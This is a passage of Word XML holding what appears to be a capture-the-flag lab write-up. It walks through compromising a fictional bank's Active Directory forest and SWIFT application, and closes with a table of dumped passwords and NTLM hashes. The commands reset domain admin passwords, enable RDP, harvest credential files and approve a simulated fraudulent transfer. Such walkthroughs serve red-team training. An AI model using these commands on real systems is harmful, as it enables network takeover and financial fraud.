    </w:p>
    <w:p w14:paraId="609FB6B4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CORP$ machine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account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NTLM:    121d735df1793559b80b78c7b551a01c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A310DED" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76F02492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11 — BANKDC Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B7EF52" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C65076A" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>BANKDC was not directly reachable from Kali through the tunnel. ROOTDC's RDP session was used as a manual pivot since it has network access to both domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA3344" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FED95A9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 xml:space="preserve">11.1 Add Machines to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>WinRM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TrustedHosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (on ROOTDC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38936C0E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From ROOTDC RDP PowerShell session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5320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Set-Item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WSMan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:\localhost\Client\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TrustedHosts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7E7BE67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-Value "10.200.40.101,10.200.40.32,10.200.40.51,10.200.40.52,10.200.40.61" -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7245537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8A026B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F93721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Get-Item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WSMan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:\localhost\Client\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TrustedHosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DC4DD3C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5467FE0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lastRenderedPageBreak/>
        <w:t xml:space="preserve">11.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>PSSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> into BANKDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3488DAA3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Enter PowerShell remoting session on BANKDC from ROOTDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01386A5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Enter-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PSSession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10.200.40.101 -Credential (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C55791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New-Object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PSCredential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"THERESERVE\Administrator",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613DC4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ConvertTo-SecureString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"Hollow@123!"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AsPlainText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-Force)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F72CB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F7C6CC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Confirm access and enable RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2365325C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</w:p>
    <w:p w14:paraId="7C49ABC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hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314F6ED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user Administrator "Hollow@123!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5B486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ItemProperty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-Path 'HKLM:\System\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CurrentControlSet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\Control\Terminal Server'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF66B2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-Name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fDenyTSConnections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 -Value 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37793359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NetFirewallRule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"Remote Desktop"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB3AD22" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B05B5FC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11.3 Reset Bank Domain Administrator Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55236D12" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Enterprise Admin rights extend to all child domains. The BANK domain Administrator password was reset from ROOTDC to gain access to bank machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1C345D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From ROOTDC PowerShell — reset bank domain admin password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1411B20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ADAccountPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05E83D2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-Identity "CN=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Administrator,CN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Users,DC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bank,DC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thereserve,DC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=loc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F670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NewPassword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ConvertTo-SecureString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"Hollow@123!"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AsPlainText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-Force)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A11BB0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-Reset -Server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BANKDC.bank.thereserve.loc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2AB01118" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8C9D9C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12 — Bank Domain Machines (WORK1, WORK2, JMP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108745FD" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3094A5FF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12.1 Access WORK1 &amp; WORK2 via Invoke-Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B0EC1F" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Nested Enter-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>PSSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not allowed inside an existing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>PSSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>. Invoke-Command was used to run commands on bank machines from the ROOTDC session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5F3BDB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 and run commands on WORK1 (10.200.40.51)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F87E4D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Invoke-Command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10.200.40.51 -Credential (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B62493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New-Object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PSCredential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bank.thereserve.loc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\Administrator",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049ED52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ConvertTo-SecureString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"Hollow@123!"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AsPlainText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Force))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ScriptBlock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5C636EC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hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9D20E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ItemProperty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-Path 'HKLM:\System\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CurrentControlSet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\Control\Terminal Server'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4003431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-Name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fDenyTSConnections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 -Value 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58326E40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Enable-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NetFirewallRule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DisplayGroup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"Remote Desktop"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BC685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net user Administrator "Hollow@123!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FC8CD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AB3811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36B8A7E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Repeat for WORK2 (10.200.40.52)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAD06BF" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE8BAB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12.2 Access JMP (Jump Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4F8C32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Access JMP the same way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C216D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Invoke-Command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10.200.40.61 -Credential (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F3AE5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New-Object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PSCredential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bank.thereserve.loc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\Administrator",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4774374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ConvertTo-SecureString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"Hollow@123!"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AsPlainText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Force))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ScriptBlock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5079089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hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4C51D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# Discover SWIFT IP via DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED7B8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Resolve-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DnsName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-Name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swift.bank.thereserve.loc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11A8C7A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-a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FF404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# List users (potential SWIFT accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6552E1D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ChildItem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C:\Users\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF492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A9638A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08568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SWIFT IP discovered: 10.200.40.201</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AED5109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Users found on JMP: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a.holt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a.turner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2D4AC31A" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282B879A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12.3 RDP into JMP via ROOTDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FDD98A" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Direct RDP from Kali to JMP was blocked by network segmentation. ROOTDC RDP was used as the jump point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F5E9F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From ROOTDC RDP session — save credentials and RDP to JMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702DCB48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/delete:10.200.40.61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC7AF9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/generic:10.200.40.61 /user:"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bank.thereserve.loc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\Administrator" /pass:"Hollow@123!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50667900" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000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mstsc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/v:10.200.40.61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063CC6F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4AA0D5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Inside JMP — enumerate SWIFT groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACF402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group "Payment Approvers" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD588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Members: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a.holt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a.turner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r.davies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s.kemp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6599578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6C0C4B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net group "Payment Capturers" /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4884E9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Members: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a.barker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c.young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g.watson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s.harding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t.buckley</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="351FE152" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2313D83D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Phase 13 — SWIFT Application Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5B60A5" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B977489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13.1 Find SWIFT Credentials in User Profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E5009" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Bank users had swift.txt credential files in their Documents folder. Capturers use their AD password (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>auto-replicated</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>). Approvers have unique passwords not synced to AD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59313FCF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Read swift.txt files from WORK1 users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5169E08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Invoke-Command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10.200.40.51 -Credential (...)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ScriptBlock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65D7B6A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type C:\Users\a.barker\Documents\Swift\swift.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F87A23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type C:\Users\g.watson\Documents\Swift\swift.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31675853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type C:\Users\t.buckley\Documents\Swift\swift.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B4260B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E244F2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FE9A1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g.watson's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 contained stored password: Corrected1996</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6A19E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a.barker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t.buckley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use AD password (replicated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4471946F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58300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Read swift.txt from JMP users (approvers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563858B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Invoke-Command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10.200.40.61 -Credential (...)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ScriptBlock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4AB1015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type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C:\Users\a.holt\Documents\Swift\swift.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038DF0D4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75CB6A6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a.holt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file: "approver — unique password, AD replication disallowed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD80301" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF80B38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13.2 Reset Bank User Passwords for SWIFT Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D30C41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Reset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svcBackups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(or any bank user) via ROOTDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C89FA3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ADAccountPassword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-Identity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a.barker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64502F2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NewPassword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ConvertTo-SecureString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"Hollow@123!"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AsPlainText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-Force)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732E911C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-Reset -Server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BANKDC.bank.thereserve.loc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5C81CF1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F373C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For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g.watson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use stored password: Corrected1996</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ACCCB7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(no reset needed, password was found in swift.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48367068" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B831D25" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="2E75B6"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>13.3 Access SWIFT Web Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20020CB4" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">SWIFT was only accessible from JMP. The browser on JMP was used to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>navigate to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AE1D66" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:before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From inside JMP RDP session — open browser and navigate to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA9AE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http://swift.bank.thereserve.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6704BF3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OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C28AF9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http://10.200.40.201</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE440E9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29B38C8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Login as capturer (Flag 17 + 18):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DE408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Email:    g.watson@bank.thereserve.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E35D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Password: Corrected1996</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D45295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4ECD9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Find dummy transaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4731C012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FROM: 631f60a3311625c0d29f5b32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA23E71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TO:   6a0a1a14a4a3f20af31cb8ff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D425A6E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Click "Capture" / "Forward"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1593FE96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99A850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Login as approver (Flag 19):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EF2547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Use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a.holt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a.turner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 their unique SWIFT password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7601AA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Click "Approve" on the captured transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362AADAD" w14:textId="77777777" w:rsidR="007B11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E55944D" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="1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Simulated fraudulent transfer completed (Flag 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54270844" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7874FEAD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Credentials &amp; Hashes — Full Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5B3B38" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11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4192"/>
        <w:gridCol w:w="2341"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B11CB" w14:paraId="39EEE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9D4D" w14:textId="77777777" w:rsidR="007B11CB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512B" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000"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88F4" w14:textId="77777777" w:rsidR="007B11C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7B11CB" w14:paraId="678BA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40D8" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/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lynda.gordon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6559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thereserve2023!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0117" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Plaintext (brute forced)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="7D19D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09D7" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/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keith.allen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77D7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Password123!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3AF6" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Plaintext (brute forced)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="59EF9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5B1F" w14:textId="77777777" w:rsidR="007B11C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svcScanning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9BBC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Password1!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7595" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Plaintext (brute forced)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="2275A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5703" w14:textId="77777777" w:rsidR="007B11C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svcBackups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E515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q9nzssaFtGHdqUV3Qv6G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2C0B" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Plaintext (LSA Secrets + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Kerberoast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306AD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CB9F" w14:textId="77777777" w:rsidR="007B11C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svcScanning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51DA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7facdc498ed1680c4fd1448319a8c04f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EFC9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Mimikatz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23BBC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D239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SERVER1$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97B2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9cd072e162098f35e4599d8e599fd583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49FA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Mimikatz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777FA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767D" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/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keith.allen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8B74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2b576acbe6bcfda7294d6bd18041b8fe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A64D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Mimikatz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0B338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811F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t0_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heather.powell</w:t>
            </w:r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829D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8fb9eb207b87c2ed42f1cdfe98ba733a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A0B7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49DE6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AA2A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t0_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josh.sutton</w:t>
            </w:r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FB8E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09910312e86ddefae7a3ee4deb6554ac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3873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4514D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CE71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CORP\Administrator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B4D8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2efe9bd0eb716d824beb7bc6140dc718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9C9C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5691B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177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CORP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krbtgt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1F4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0c757a3445acb94a654554f3ac529ede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11AB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>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="57766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7CBB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THERESERVE$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D452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4767cd467fa7bf72fb41b05b963a4cc6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2515" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>NTLM (trust account)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="1344B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7700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THERESERVE\Administrator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22D9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f24bc4a9664a67b39bcae9a513d978b7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D5BE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ROOTDC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="275B7B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E55E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THERESERVE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krbtgt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2F86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b232e0b2df4eb28a803bc21bf9a6cc87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027E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ROOTDC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="40344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4FE0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BANK$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3DD5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b20b54058dd0f3c90c0bb12b12bd510f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FF27" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>NTLM (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DCSync</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ROOTDC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="445BA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6A22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THERESERVE\Administrator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7086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Hollow@123!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73D0" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Plaintext (set by attacker)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="5C416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6EA0" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>BANK\Administrator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A89F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Hollow@123!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B3F4" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Plaintext (set by attacker)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="76106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BB31" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/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g.watson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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(SWIFT)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3326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Corrected1996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054F" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Plaintext (found in swift.txt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F2460E2" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A5BCCE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Flags — 20/20 Complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E490AAC" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11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800"/>
        <w:gridCol w:w="3960"/>
        <w:gridCol w:w="900"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B11CB" w14:paraId="451E19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282C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08F5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18B33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Machine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60876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3DAF" w14:textId="77777777" w:rsidR="007B11CB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B11CB" w14:paraId="3229F9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07F3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B929" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Perimeter Breach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4977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WebMail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 / WEB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1F76" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>OctoberCMS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enum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+ Webmail brute force (Hydra)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EBC6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3C2DC9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2858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74A9" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>AD Breach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562E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WRK2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F401" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Domain enumeration via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>PowerView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+ net commands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CDA3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59563C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9B3D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50BF" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CORP Tier 2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8435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WRK2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B069" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
